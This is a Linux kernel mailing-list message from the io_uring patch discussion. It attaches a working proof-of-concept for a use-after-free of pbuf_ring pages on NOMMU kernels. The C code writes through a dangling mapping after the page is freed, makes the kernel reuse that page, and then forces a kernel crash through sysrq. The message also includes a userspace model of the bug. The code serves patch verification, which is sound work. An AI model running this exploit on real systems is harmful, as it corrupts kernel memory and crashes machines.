public inbox for io-uring@vger.kernel.org
From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: Jens Axboe <axboe@kernel.dk>
Cc: io-uring@vger.kernel.org
Subject: Re: [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps
Date: Tue, 21 Apr 2026 18:01:36 +0200
Message-ID: <2026042140-arrogance-freehand-d8bd@gregkh>
In-Reply-To: <2026042108-fiscally-unglazed-56c7@gregkh>

[-- Attachment #1: Type: text/plain, Size: 2025 bytes --]

On Tue, Apr 21, 2026 at 03:55:38PM +0200, Greg Kroah-Hartman wrote:
> On Tue, Apr 21, 2026 at 07:50:32AM -0600, Jens Axboe wrote:
> > On 4/21/26 7:46 AM, Greg Kroah-Hartman wrote:
> > > Note, I have no way of testing this, I'm only forwarding this on because
> > > I got the bug report and was able to generate something that "seems"
> > 
> > AI bug report I presume? Because I can't imagine anyone ever attempted
> > to run this.
> 
> Yes, I got a bunch of "non-mmu" bug reports, which is a bit odd but I
> guess you can do that with qemu these days?  I should dig into that,
> maybe that way I can test this and get a reproducer for you.  If not,
> let's just bin the thing.
> 
> > > correct, but it might be a total load of crap here, my knowledge of the
> > > vm layer is very low so take this for where it is coming from (i.e. a
> > > non-deterministic pattern matching system.)
> > > 
> > > I do have another patch that just disables io_uring for !MMU systems, if
> > > you want that instead?  Or is this feature something that !MMU devices
> > > actually care about?
> > 
> > I mean, who really cares about !MMU in the first place, we should just
> > kill that off with a passion.
> > 
> > Let me take a closer look at this and bounce it past some vm people, my
> > nommu knowledge is close to zero as it's never been relevant in my
> > professional life time. Which is saying something...
> 
> Let me try to get a reproducer going first, let's not waste any more
> human time on this just yet, sorry for sending this out without that
> done first...

Ok, attached is a poc.c and a script to run it.  If you run this on a
7.0 kernel today, it "should" crash, and then if you apply the patch it
doesn't (or at least that's what happened in my testing.)

Note, I have run this locally and it seems to work, but be careful, as
I can't guarantee anything.  It is a bit odd in that it "crashes" the
kernel with a sysrq call to show "proof", although that is a cool trick
that I need to remember...
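
For anyone who wants the idea before reading the attachment, here is a
rough userspace model of what poc.c checks.  It is only a sketch, not
kernel code: every model_* name is made up for illustration, the "page"
is 64 bytes instead of 4096, and the free list is a plain LIFO stack
standing in for the pcp list.  The mmap_takes_ref argument switches
between the current behaviour (no reference taken at mmap time) and
what the patch is meant to do.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MODEL_PAGE_SIZE	64	/* tiny stand-in for a 4096-byte page */
#define MODEL_CANARY	0x55

/* Hypothetical stand-in for struct page plus its backing memory. */
struct model_page {
	int refcount;
	unsigned char data[MODEL_PAGE_SIZE];
	struct model_page *next_free;
};

/* LIFO free list: the most recently freed page is handed out first. */
static struct model_page *free_list;

void model_free(struct model_page *p)
{
	memset(p->data, 0, sizeof(p->data));	/* models init_on_free=1 */
	p->next_free = free_list;
	free_list = p;
}

struct model_page *model_alloc(void)
{
	struct model_page *p = free_list;

	if (!p)
		return NULL;
	free_list = p->next_free;
	p->next_free = NULL;
	p->refcount = 1;
	return p;
}

void model_get_page(struct model_page *p)
{
	assert(p->refcount > 0);
	p->refcount++;
}

void model_put_page(struct model_page *p)
{
	assert(p->refcount > 0);
	if (--p->refcount == 0)
		model_free(p);
}

/*
 * Model of register -> mmap -> write canary -> unregister.
 * Returns how many canary bytes were lost after the unregister.
 */
int model_run(struct model_page *backing, int mmap_takes_ref)
{
	struct model_page *page;
	unsigned char *ring;
	int i, dirty = 0;

	free_list = NULL;
	backing->refcount = 0;
	model_free(backing);		/* seed the free list with one page */

	page = model_alloc();		/* REGISTER_PBUF_RING */
	ring = page->data;		/* mmap hands out the page address */
	if (mmap_takes_ref)
		model_get_page(page);	/* behaviour with the fix */
	memset(ring, MODEL_CANARY, MODEL_PAGE_SIZE);
	model_put_page(page);		/* UNREGISTER_PBUF_RING */

	for (i = 0; i < MODEL_PAGE_SIZE; i++)
		if (ring[i] != MODEL_CANARY)
			dirty++;
	return dirty;
}
```

With mmap_takes_ref set to 0 the unregister drops the last reference,
the page is zeroed and pushed back on the free list, and the next
model_alloc() returns that same page while "ring" still points at it.
With it set to 1 the canary survives and nothing is freed.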

thanks,

greg k-h

[-- Attachment #2: poc.c --]
[-- Type: text/plain, Size: 6740 bytes --]

// SPDX-License-Identifier: GPL-2.0
/*
 * PoC for ANT-2026-02884: io_uring NOMMU pbuf_ring page use-after-free.
 * Secondary: ANT-2026-02650 (duplicate vm_start) shares the same root
 * cause but hits a mm/nommu.c BUG_ON that the fix does not address;
 * this PoC targets 02884.
 *
 * Fixed by commit b4190296e84b ("io_uring: take page references for
 * NOMMU pbuf_ring mmaps").
 *
 * Mechanism
 * ---------
 * Under !CONFIG_MMU, io_uring_get_unmapped_area() returns the kernel
 * virtual address of the io_mapped_region's backing pages directly and
 * io_uring_mmap() takes no page references.  IORING_UNREGISTER_PBUF_RING
 *   -> io_put_bl()
 *   -> io_free_region()
 *   -> release_pages()
 * therefore drops the only reference and the page returns to the buddy
 * allocator while the user's VMA still has vm_start pointing into it.
 * The user can read/write whatever the allocator hands out next.
 *
 * Detection: write a canary to the mmap'd page, unregister, re-read.
 * Boot with init_on_free=1 so freed pages are zeroed; on a vulnerable
 * kernel the canary becomes 0x00.  On a fixed kernel io_uring_mmap()
 * holds a get_page reference, release_pages() leaves refcount >= 1,
 * the page is not freed, and the canary survives.
 *
 * On detection, demonstrate the write-after-free (re-allocate the page
 * inside the kernel and observe it via the dangling pointer), then
 * sysrq-crash so the qemu console shows an unambiguous kernel panic.
 *
 * Build (riscv64 nommu, nolibc, BINFMT_ELF_FDPIC loadable):
 *   make -C linux ARCH=riscv O=$PWD/build-nommu headers
 *   clang --target=riscv64-unknown-linux-gnu -march=rv64imac -mabi=lp64 \
 *         -mno-relax -static-pie -nostdlib -fno-stack-protector \
 *         -fno-builtin -isystem build-nommu/usr/include \
 *         -Ilinux/tools/include/nolibc -O2 -o poc poc.c \
 *         -fuse-ld=lld -Wl,--no-dynamic-linker -Wl,-N
 *
 * -isystem MUST come before nolibc so <asm/unistd.h> resolves to riscv,
 * not the host's; -Wl,-N forces a single PT_LOAD so the FDPIC loader
 * (which does not apply R_RISCV_RELATIVE) doesn't split text/data.
 *
 * Run as init under qemu-system-riscv64 -M virt -bios none.
 * Required: CONFIG_MMU=n, CONFIG_IO_URING=y, CONFIG_MAGIC_SYSRQ=y,
 * boot with init_on_free=1.
 */

/*
 * binfmt_elf_fdpic's initial stack layout is not the SysV layout that
 * nolibc's crt.h _start_c() expects; the auxv walk runs off into
 * garbage.  We don't need argc/argv/envp, so suppress crt.h and supply
 * a minimal _start_c that just calls main.  arch-riscv.h still provides
 * the asm _start that calls _start_c.
 */
#define _NOLIBC_CRT_H
char **environ;
const unsigned long *_auxv;
#include "nolibc.h"

int main(void);
void _start_c(long *sp)
{
	(void)sp;
	exit(main());
}

#define __NR_io_uring_setup		425
#define __NR_io_uring_register		427

#define IORING_REGISTER_PBUF_RING	22
#define IORING_UNREGISTER_PBUF_RING	23
#define IORING_OFF_PBUF_RING		0x80000000ULL
#define IORING_OFF_PBUF_SHIFT		16
#define IOU_PBUF_RING_MMAP		1

#define PAGE_SIZE	4096
#define CANARY		0x55

struct io_sqring_offsets {
	uint32_t head, tail, ring_mask, ring_entries, flags, dropped, array;
	uint32_t resv1;
	uint64_t user_addr;
};

struct io_cqring_offsets {
	uint32_t head, tail, ring_mask, ring_entries, overflow, cqes, flags;
	uint32_t resv1;
	uint64_t user_addr;
};

struct io_uring_params {
	uint32_t sq_entries, cq_entries, flags, sq_thread_cpu, sq_thread_idle;
	uint32_t features, wq_fd, resv[3];
	struct io_sqring_offsets sq_off;
	struct io_cqring_offsets cq_off;
};

struct io_uring_buf_reg {
	uint64_t ring_addr;
	uint32_t ring_entries;
	uint16_t bgid;
	uint16_t flags;
	uint64_t resv[3];
};

static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
	return my_syscall2(__NR_io_uring_setup, entries, p);
}

static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr)
{
	return my_syscall4(__NR_io_uring_register, fd, op, arg, nr);
}

static void die(const char *what, long ret)
{
	printf("[-] %s: %ld\n", what, ret);
	if (getpid() == 1) {
		reboot(LINUX_REBOOT_CMD_POWER_OFF);
	}
	exit(1);
}

static void crash_kernel(void)
{
	int fd = open("/proc/sysrq-trigger", O_WRONLY);

	if (fd >= 0)
		write(fd, "c", 1);
	/* sysrq disabled or /proc missing — clean exit so qemu log is
	 * still parseable. */
	reboot(LINUX_REBOOT_CMD_POWER_OFF);
}

int main(void)
{
	struct io_uring_params p;
	struct io_uring_buf_reg reg;
	volatile unsigned char *ring;
	int fd, ret, i, dirty;

	if (getpid() == 1) {
		mkdir("/proc", 0555);
		mount("proc", "/proc", "proc", 0, NULL);
	}

	memset(&p, 0, sizeof(p));
	fd = io_uring_setup(8, &p);
	if (fd < 0)
		die("io_uring_setup", fd);

	memset(&reg, 0, sizeof(reg));
	reg.ring_entries = 8;
	reg.bgid = 0;
	reg.flags = IOU_PBUF_RING_MMAP;
	ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);
	if (ret < 0)
		die("REGISTER_PBUF_RING", ret);

	ring = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
		    IORING_OFF_PBUF_RING | (0ULL << IORING_OFF_PBUF_SHIFT));
	if (ring == MAP_FAILED)
		die("mmap PBUF_RING", (long)ring);

	/* %p expects a void *; drop the volatile qualifier for printing only */
	printf("[*] pbuf_ring page mmap()ed at %p\n", (void *)ring);

	for (i = 0; i < PAGE_SIZE; i++)
		ring[i] = CANARY;

	memset(&reg, 0, sizeof(reg));
	reg.bgid = 0;
	ret = io_uring_register(fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);
	if (ret < 0)
		die("UNREGISTER_PBUF_RING", ret);

	printf("[*] unregistered; canary[0..3] = %02x %02x %02x %02x\n",
	       ring[0], ring[1], ring[2], ring[3]);

	dirty = 0;
	for (i = 0; i < PAGE_SIZE; i++)
		if (ring[i] != CANARY)
			dirty++;

	if (!dirty) {
		printf("[+] OK: canary intact — mmap holds page reference, "
		       "fix is applied\n");
		munmap((void *)ring, PAGE_SIZE);
		close(fd);
		if (getpid() == 1)
			reboot(LINUX_REBOOT_CMD_POWER_OFF);
		return 0;
	}

	printf("[!] VULNERABLE: %d/%d canary bytes clobbered after unregister "
	       "(ring[0]=%02x, expected %02x) — page was freed under live mmap\n",
	       dirty, PAGE_SIZE, ring[0], CANARY);

	/*
	 * Demonstrate write-after-free: scribble through the dangling
	 * mapping, then make the kernel allocate a fresh page.  The pcp
	 * freelist is LIFO, so the just-freed page is handed straight
	 * back; we can observe the kernel's writes through our pointer.
	 */
	for (i = 0; i < PAGE_SIZE; i++)
		ring[i] = 0x41;

	memset(&reg, 0, sizeof(reg));
	reg.ring_entries = 8;
	reg.bgid = 1;
	reg.flags = IOU_PBUF_RING_MMAP;
	ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);

	printf("[!] sprayed 0x41, re-registered bgid=1 (ret=%d); "
	       "ring[0..3] now %02x %02x %02x %02x — kernel reused the page\n",
	       ret, ring[0], ring[1], ring[2], ring[3]);
	printf("[!] triggering sysrq crash\n");
	if (getpid() == 1)
		crash_kernel();
	return 1;
}
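
The PoC above hard-codes buffer group 0 when it builds the mmap offset.
As a small sketch of how the same expression generalizes to another
bgid, assuming only the two IORING_OFF_* values already defined in
poc.c: the helper name pbuf_ring_mmap_offset() is hypothetical and is
not a kernel or liburing API, and the sketch does not check whether the
kernel accepts every 16-bit bgid through this encoding.

```c
#include <stdint.h>

/* Values copied from the defines in poc.c. */
#define IORING_OFF_PBUF_RING	0x80000000ULL
#define IORING_OFF_PBUF_SHIFT	16

/* Hypothetical helper: mmap offset selecting the pbuf ring of one bgid. */
uint64_t pbuf_ring_mmap_offset(uint16_t bgid)
{
	return IORING_OFF_PBUF_RING |
	       ((uint64_t)bgid << IORING_OFF_PBUF_SHIFT);
}
```

For bgid 0 this gives the 0x80000000 offset that the PoC passes to
mmap(); the second registration in the PoC (bgid 1) would map at
0x80010000 if it were mmap()ed as well.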

[-- Attachment #3: run-poc.sh --]
[-- Type: application/x-sh, Size: 2871 bytes --]


Thread overview: 13+ messages
2026-04-21 13:46 [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps Greg Kroah-Hartman
2026-04-21 13:50 ` Jens Axboe
2026-04-21 13:55   ` Greg Kroah-Hartman
2026-04-21 14:02     ` Jens Axboe
2026-04-21 16:01     ` Greg Kroah-Hartman [this message]
2026-04-21 16:05       ` Jens Axboe
2026-04-21 16:21         ` Jens Axboe
2026-04-21 16:24           ` Greg Kroah-Hartman
2026-04-21 16:41             ` Jens Axboe
2026-04-21 17:04               ` Jens Axboe
2026-04-21 17:38                 ` Jens Axboe
2026-04-21 17:39 ` Jens Axboe
2026-04-22  1:17   ` Jens Axboe
